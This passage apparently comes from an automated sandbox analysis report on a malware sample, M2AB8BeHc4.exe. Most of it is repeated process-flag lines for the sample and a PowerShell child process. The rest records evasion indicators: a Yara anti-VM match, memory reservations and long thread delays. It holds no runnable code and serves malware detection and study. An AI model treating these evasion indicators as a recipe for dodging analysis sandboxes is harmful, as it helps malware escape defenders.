Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: M2AB8BeHc4.exe PID: 6520, type: MEMORYSTR

Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Memory allocated: 26C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Memory allocated: 28B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Memory allocated: 48B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Memory allocated: 8FE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Memory allocated: 74E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Memory allocated: 9FE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Memory allocated: AFE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Memory allocated: B6F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Memory allocated: C6F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Memory allocated: D6F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Memory allocated: FA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Memory allocated: 2C20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Memory allocated: 2A00000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Thread delayed: delay time: 599874	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Thread delayed: delay time: 599219	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Thread delayed: delay time: 599109	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Thread delayed: delay time: 599000	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Thread delayed: delay time: 598891	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Thread delayed: delay time: 598766	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Thread delayed: delay time: 598641	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Thread delayed: delay time: 598531	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Thread delayed: delay time: 598422	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Thread delayed: delay time: 598312	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Thread delayed: delay time: 598203	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Thread delayed: delay time: 598089	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Thread delayed: delay time: 597969	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Thread delayed: delay time: 597859	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Thread delayed: delay time: 597750	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Thread delayed: delay time: 597640	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Thread delayed: delay time: 597531	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Thread delayed: delay time: 597422	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Thread delayed: delay time: 597312	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Thread delayed: delay time: 597203	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Thread delayed: delay time: 597093	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Thread delayed: delay time: 596984	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Thread delayed: delay time: 596875	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Thread delayed: delay time: 596765	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Thread delayed: delay time: 596656	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Thread delayed: delay time: 596547	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Thread delayed: delay time: 596437	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Thread delayed: delay time: 596328	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Thread delayed: delay time: 596219	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Thread delayed: delay time: 596109	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Thread delayed: delay time: 596000	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Thread delayed: delay time: 595890	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Thread delayed: delay time: 595780	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Thread delayed: delay time: 595672	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Thread delayed: delay time: 595562	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Thread delayed: delay time: 595453	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Thread delayed: delay time: 595344	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Thread delayed: delay time: 595234	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Thread delayed: delay time: 595125	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Thread delayed: delay time: 595015	Jump to behavior
